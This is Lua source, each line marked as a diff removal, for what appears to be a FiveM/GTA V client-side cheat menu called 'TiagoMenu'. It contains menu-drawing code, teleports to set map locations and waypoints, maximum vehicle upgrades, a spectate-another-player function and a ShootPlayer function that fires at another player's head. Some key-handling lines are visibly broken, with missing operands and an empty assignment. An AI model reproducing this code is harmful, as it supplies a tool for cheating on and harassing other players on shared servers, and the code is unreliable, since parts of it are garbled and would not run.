- if menus[id].titleBackgroundSprite then
- RequestStreamedTextureDict(menus[id].titleBackgroundSprite.dict, false)
- while not HasStreamedTextureDictLoaded(menus[id].titleBackgroundSprite.dict) do
- Citizen.Wait(0)
- end
- end
- debugPrint(tostring(id) .. " menu opened")
- else
- debugPrint("Failed to open " .. tostring(id) .. " menu: it doesn't exist")
- end
- end
- function TiagoMenu.IsMenuOpened(id)
- return isMenuVisible(id)
- end
- function TiagoMenu.IsAnyMenuOpened()
- for id, _ in pairs(menus) do
- if isMenuVisible(id) then
- return true
- end
- end
- return false
- end
- function TiagoMenu.IsMenuAboutToBeClosed()
- if menus[currentMenu] then
- return menus[currentMenu].aboutToBeClosed
- else
- return false
- end
- end
- function TiagoMenu.CloseMenu()
- if menus[currentMenu] then
- if menus[currentMenu].aboutToBeClosed then
- menus[currentMenu].aboutToBeClosed = false
- setMenuVisible(currentMenu, false)
- debugPrint(tostring(currentMenu) .. " menu closed")
- PlaySoundFrontend(-1, "QUIT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
- optionCount = 0
- currentMenu = nil
- currentKey = nil
- else
- menus[currentMenu].aboutToBeClosed = true
- debugPrint(tostring(currentMenu) .. " menu about to be closed")
- end
- end
- end
- function TiagoMenu.Button(text, subText)
- local buttonText = text
- if subText then
- buttonText = "{ " .. tostring(buttonText) .. ", " .. tostring(subText) .. " }"
- end
- if menus[currentMenu] then
- optionCount = optionCount + 1
- local isCurrent = menus[currentMenu].currentOption == optionCount
- drawButton(text, subText)
- if isCurrent then
- if currentKey == then
- PlaySoundFrontend(-1, menus[currentMenu], menus[currentMenu].buttonPressedSound.set, true)
- debugPrint(buttonText .. " button pressed")
- return true
- elseif currentKey == keys.left or currentKey == keys.right then
- PlaySoundFrontend(-1, "NAV_UP_DOWN", "HUD_FRONTEND_DEFAULT_SOUNDSET", true)
- end
- end
- return false
- else
- debugPrint("Failed to create " .. buttonText .. " button: " .. tostring(currentMenu) .. " menu doesn't exist")
- return false
- end
- end
- function TiagoMenu.MenuButton(text, id)
- if menus[id] then
- if TiagoMenu.Button(text) then
- setMenuVisible(currentMenu, false)
- setMenuVisible(id, true, true)
- return true
- end
- else
- debugPrint("Failed to create " .. tostring(text) .. " menu button: " .. tostring(id) .. " submenu doesn't exist")
- end
- return false
- end
- function TiagoMenu.CheckBox(text, bool, callback)
- local checked = "~r~~h~Off"
- if bool then
- checked = "~g~~h~On"
- end
- if TiagoMenu.Button(text, checked) then
- bool = not bool
- debugPrint(tostring(text) .. " checkbox changed to " .. tostring(bool))
- callback(bool)
- return true
- end
- return false
- end
- function ch(C,x,y)
- SetTextFont(0)
- SetTextProportional(1)
- SetTextScale(0.0,0.4)
- SetTextDropshadow(1,0,0,0,255)
- SetTextEdge(1,0,0,0,255)
- SetTextDropShadow()
- SetTextOutline()
- SetTextEntry("STRING")
- AddTextComponentString(C)
- DrawText(x,y)
- end
- function TiagoMenu.ComboBox(text, items, currentIndex, selectedIndex, callback)
- local itemsCount = #items
- local selectedItem = items[currentIndex]
- local isCurrent = menus[currentMenu].currentOption == (optionCount + 1)
- if itemsCount > 1 and isCurrent then
- selectedItem = "← " .. tostring(selectedItem) .. " →"
- end
- if TiagoMenu.Button(text, selectedItem) then
- selectedIndex = currentIndex
- callback(currentIndex, selectedIndex)
- return true
- elseif isCurrent then
- if currentKey == keys.left then
- if currentIndex > 1 then
- currentIndex = currentIndex - 1
- else
- currentIndex = itemsCount
- end
- elseif currentKey == keys.right then
- if currentIndex < itemsCount then
- currentIndex = currentIndex + 1
- else
- currentIndex = 1
- end
- end
- else
- currentIndex = selectedIndex
- end
- callback(currentIndex, selectedIndex)
- return false
- end
- function TiagoMenu.Display()
- if isMenuVisible(currentMenu) then
- if menus[currentMenu].aboutToBeClosed then
- TiagoMenu.CloseMenu()
- else
- ClearAllHelpMessages()
- drawTitle()
- drawSubTitle()
- currentKey = nil
- if IsDisabledControlJustPressed(0, keys.down) then
- PlaySoundFrontend(-1, "PIN_BUTTON", "ATM_SOUNDS", true) --down
- if menus[currentMenu].currentOption < optionCount then
- menus[currentMenu].currentOption = menus[currentMenu].currentOption + 1
- else
- menus[currentMenu].currentOption = 1
- end
- elseif IsDisabledControlJustPressed(0, keys.up) then
- PlaySoundFrontend(-1, "PIN_BUTTON", "ATM_SOUNDS", true) --up
- if menus[currentMenu].currentOption > 1 then
- menus[currentMenu].currentOption = menus[currentMenu].currentOption - 1
- else
- menus[currentMenu].currentOption = optionCount
- end
- elseif IsDisabledControlJustPressed(0, keys.left) then
- currentKey = keys.left
- elseif IsDisabledControlJustPressed(0, keys.right) then
- currentKey = keys.right
- elseif IsDisabledControlJustPressed(0, then
- currentKey =
- elseif IsDisabledControlJustPressed(0, keys.back) then
- if menus[menus[currentMenu].previousMenu] then
- PlaySoundFrontend(-1, "Pin_Bad", "DLC_HEIST_BIOLAB_PREP_HACKING_SOUNDS", true) --back
- setMenuVisible(menus[currentMenu].previousMenu, true)
- else
- TiagoMenu.CloseMenu()
- end
- end
- optionCount = 0
- end
- end
- end
- function TiagoMenu.SetMenuWidth(id, width)
- setMenuProperty(id, "width", width)
- end
- function TiagoMenu.SetMenuX(id, x)
- setMenuProperty(id, "x", x)
- end
- function TiagoMenu.SetMenuY(id, y)
- setMenuProperty(id, "y", y)
- end
- function TiagoMenu.SetMenuMaxOptionCountOnScreen(id, count)
- setMenuProperty(id, "maxOptionCount", count)
- end
- function TiagoMenu.SetTitleColor(id, r, g, b, a)
- setMenuProperty(id, "titleColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].titleColor.a})
- end
- function TiagoMenu.SetTitleBackgroundColor(id, r, g, b, a)
- setMenuProperty(
- id,
- "titleBackgroundColor",
- {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].titleBackgroundColor.a}
- )
- end
- function TiagoMenu.SetTitleBackgroundSprite(id, textureDict, textureName)
- setMenuProperty(id, "titleBackgroundSprite", {dict = textureDict, name = textureName})
- end
- function TiagoMenu.SetSubTitle(id, text)
- setMenuProperty(id, "subTitle", string.upper(text))
- end
- function TiagoMenu.SetMenuBackgroundColor(id, r, g, b, a)
- setMenuProperty(
- id,
- "menuBackgroundColor",
- {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuBackgroundColor.a}
- )
- end
- function TiagoMenu.SetMenuTextColor(id, r, g, b, a)
- setMenuProperty(id, "menuTextColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuTextColor.a})
- end
- function TiagoMenu.SetMenuSubTextColor(id, r, g, b, a)
- setMenuProperty(id, "menuSubTextColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuSubTextColor.a})
- end
- function TiagoMenu.SetMenuFocusColor(id, r, g, b, a)
- setMenuProperty(id, "menuFocusColor", {["r"] = r, ["g"] = g, ["b"] = b, ["a"] = a or menus[id].menuFocusColor.a})
- end
- function TiagoMenu.SetMenuButtonPressedSound(id, name, set)
- setMenuProperty(id, "buttonPressedSound", {["name"] = name, ["set"] = set})
- end
- function KeyboardInput(TextEntry, ExampleText, MaxStringLength)
- AddTextEntry("FMMC_KEY_TIP1", TextEntry .. ":")
- DisplayOnscreenKeyboard(1, "FMMC_KEY_TIP1", "", ExampleText, "", "", "", MaxStringLength)
- blockinput = true
- while UpdateOnscreenKeyboard() ~= 1 and UpdateOnscreenKeyboard() ~= 2 do
- Citizen.Wait(0)
- end
- if UpdateOnscreenKeyboard() ~= 2 then
- local result = GetOnscreenKeyboardResult()
- Citizen.Wait(500)
- blockinput = false
- return result
- else
- Citizen.Wait(500)
- blockinput = false
- return nil
- end
- end
- local function getPlayerIds()
- local players = {}
- for i = 0, GetNumberOfPlayers(128) do
- if NetworkIsPlayerActive(i) then
- players[#players + 1] = i
- end
- end
- return players
- end
- function DrawText3D(x, y, z, text, r, g, b)
- SetDrawOrigin(x, y, z, 0)
- SetTextFont(0)
- SetTextProportional(0)
- SetTextScale(0.0, 0.20)
- SetTextColour(r, g, b, 255)
- SetTextDropshadow(0, 0, 0, 0, 255)
- SetTextEdge(2, 0, 0, 0, 150)
- SetTextDropShadow()
- SetTextOutline()
- SetTextEntry("STRING")
- SetTextCentre(1)
- AddTextComponentString(text)
- DrawText(0.0, 0.0)
- ClearDrawOrigin()
- end
- function math.round(num, numDecimalPlaces)
- return tonumber(string.format("%." .. (numDecimalPlaces or 0) .. "f", num))
- end
- local function RGBRainbow(frequency)
- local result = {}
- local curtime = GetGameTimer() / 1000
- result.r = math.floor(math.sin(curtime * frequency + 0) * 127 + 128)
- result.g = math.floor(math.sin(curtime * frequency + 2) * 127 + 128)
- result.b = math.floor(math.sin(curtime * frequency + 4) * 127 + 128)
- return result
- end
- function drawNotification(text)
- SetNotificationTextEntry("STRING")
- AddTextComponentString(text)
- DrawNotification(false, false)
- end
- local allWeapons = {
- }
- local Enabled = true
- local Collision = true
- function TeleportToCoords()
- local x = KeyboardInput("Enter X Pos", "", 100)
- local y = KeyboardInput("Enter Y Pos", "", 100)
- local z = KeyboardInput("Enter Z Pos", "", 100)
- local entity
- if x ~= "" and y ~= "" and z ~= "" then
- if IsPedInAnyVehicle(GetPlayerPed(-1),0) and GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1),0),-1)==GetPlayerPed(-1) then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1),0)
- else
- entity = PlayerPedId()
- end
- if entity then
- SetEntityCoords(entity, x + 0.5, y + 0.5, z + 0.5, 1,0,0,1)
- end
- else
- drawNotification("~g~Invalid Coords!")
- end
- end
- local function LSPD()
- local bB = 436.873
- local bC = -987.138
- local bD = 30.69
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function fbi()
- local bB = 160.868
- local bC = -745.831
- local bD = 250.063
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function ls()
- local bB = -365.425
- local bC = -131.809
- local bD = 37.873
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function gp()
- local bB = 266.12
- local bC = -752.51
- local bD = 34.64
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function dealership()
- local bB = -15.32
- local bC = -1080.69
- local bD = 26.14
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function Ammunation()
- local bB = 19.22
- local bC = -1108.71
- local bD = 29.8
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function shopclothes()
- local bB = 428.61
- local bC = -799.89
- local bD = 29.49
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function barber()
- local bB = -32.84
- local bC = -152.34
- local bD = 57.08
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function MichaelHouse()
- local bB = -801.847
- local bC = 175.266
- local bD = 72.845
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function trevor()
- local bB = 1972.972
- local bC = 3816.498
- local bD = 32.95
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function spot()
- local bB = 497.76
- local bC = -1334.01
- local bD = 29.33
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function MazeBank()
- local bB = -75.015
- local bC = -818.215
- local bD = 326.176
- if bB ~= '' and bC ~= '' and bD ~= '' then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1)
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- if entity then
- SetEntityCoords(entity, bB + 0.5, bC + 0.5, bD + 0.5, 1, 0, 0, 1)
- end
- end
- end
- local function TeleportToWaypoint()
- if DoesBlipExist(GetFirstBlipInfoId(8)) then
- local blipIterator = GetBlipInfoIdIterator(8)
- local blip = GetFirstBlipInfoId(8, blipIterator)
- WaypointCoords = Citizen.InvokeNative(0xFA7C7F0AADF25D09, blip, Citizen.ResultAsVector()) --Thanks To Briglair []
- wp = true
- else
- drawNotification("~r~No waypoint!")
- end
- local zHeigt = 0.0
- height = 1000.0
- while true do
- Citizen.Wait(0)
- if wp then
- if
- IsPedInAnyVehicle(GetPlayerPed(-1), 0) and
- (GetPedInVehicleSeat(GetVehiclePedIsIn(GetPlayerPed(-1), 0), -1) == GetPlayerPed(-1))
- then
- entity = GetVehiclePedIsIn(GetPlayerPed(-1), 0)
- else
- entity = GetPlayerPed(-1)
- end
- SetEntityCoords(entity, WaypointCoords.x, WaypointCoords.y, height)
- FreezeEntityPosition(entity, true)
- local Pos = GetEntityCoords(entity, true)
- if zHeigt == 0.0 then
- height = height - 25.0
- SetEntityCoords(entity, Pos.x, Pos.y, height)
- bool, zHeigt = GetGroundZFor_3dCoord(Pos.x, Pos.y, Pos.z, 0)
- else
- SetEntityCoords(entity, Pos.x, Pos.y, zHeigt)
- FreezeEntityPosition(entity, false)
- wp = false
- height = 1000.0
- zHeigt = 0.0
- drawNotification("~g~Teleported to waypoint!")
- break
- end
- end
- end
- end
- function stringsplit(inputstr, sep)
- if sep == nil then
- sep = "%s"
- end
- local t = {}
- i = 1
- for str in string.gmatch(inputstr, "([^" .. sep .. "]+)") do
- t[i] = str
- i = i + 1
- end
- return t
- end
- local Spectating = false
- function SpectatePlayer(player)
- local playerPed = PlayerPedId()
- Spectating = not Spectating
- local targetPed = GetPlayerPed(player)
- if (Spectating) then
- local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
- RequestCollisionAtCoord(targetx, targety, targetz)
- NetworkSetInSpectatorMode(true, targetPed)
- drawNotification("Spectating " .. GetPlayerName(player))
- else
- local targetx, targety, targetz = table.unpack(GetEntityCoords(targetPed, false))
- RequestCollisionAtCoord(targetx, targety, targetz)
- NetworkSetInSpectatorMode(false, targetPed)
- drawNotification("Stopped Spectating " .. GetPlayerName(player))
- end
- end
- function ShootPlayer(player)
- local head = GetPedBoneCoords(player, GetEntityBoneIndexByName(player, "SKEL_HEAD"), 0.0, 0.0, 0.0)
- SetPedShootsAtCoord(PlayerPedId(), head.x, head.y, head.z, true)
- end
- function MaxOut(veh)
- SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- SetVehicleWheelType(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 14, 16, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 20, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 22, true)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 23, 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 24, 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 27) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 28) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 30) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 33) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 34) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 35) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 38) - 1, true)
- SetVehicleWindowTint(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1)
- SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
- SetVehicleNumberPlateTextIndex(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5)
- end
- function engine(veh)
- SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
- SetVehicleTyresCanBurst(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
- end
- function engine1(veh)
- SetVehicleModKit(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- SetVehicleWheelType(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 1) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 2) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 3) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 4) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 5) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 6) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 7) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 8) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 9) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 10) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 11) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 12) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 13) - 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 14, 16, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 15) - 2, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 16) - 1, false)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 17, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 18, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 19, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 20, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 21, true)
- ToggleVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 22, true)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 23, 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 24, 1, false)
- SetVehicleMod(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25, GetNumVehicleMods(GetVehiclePedIsIn(GetPlayerPed(-1), false), 25) - 1, false)
